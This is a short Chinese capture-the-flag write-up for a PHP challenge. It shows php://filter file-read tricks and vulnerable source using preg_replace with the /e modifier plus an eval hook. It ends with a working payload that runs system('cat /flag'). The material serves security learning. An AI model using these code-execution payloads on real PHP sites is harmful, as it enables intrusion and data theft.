先构造语句读取next.php文件
?text=data://text/plain;base64,SSBoYXZlIGEgZHJlYW0=&file=php://filter/read=convert.base64-encode/resource=next.php
<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;
function complex($re, $str) {
return preg_replace(
'/(' . $re . ')/ei',
'strtolower("\\1")',
$str
);
}
foreach($_GET as $re => $str) {
echo complex($re, $str). "\n";
}
function getFlag(){
@eval($_GET['cmd']);
}
关键点在于preg_replace
当pattern传入的正则表达式带有/e时,存在命令执行,即当匹配到符合正则表达式的字符串时,第二个参数的字符串可被当做代码来执行。
这里第二个参数固定为strtolower("\1")
这里的\\1实际上体现为\1
对一个正则表达式模式或部分模式两边添加圆括号将导致相关匹配存储到一个临时缓冲区中,所捕获的每个子匹配都按照在正则表达式模式中从左到右出现的顺序存储。缓冲区编号从 1 开始,最多可存储 99 个捕获的子表达式。每个缓冲区都可以使用 ‘\n’ 访问
这里的\1指的是第一个匹配项,官方payload/?.*={${phpinfo()}}
即
<?php
preg_replace('/(.*)/ei','strtolower("\\1")','{${phpinfo()}}');
但这里存在的问题是,GET方式传的字符串,.会被替换成_,这里采用\S*=${phpinfo()} #\S 在php正则表达式中表示匹配所有非空字符,*表示多次匹配
最后payload:/next.php?\S*=${getFlag()}&cmd=system('cat /flag');
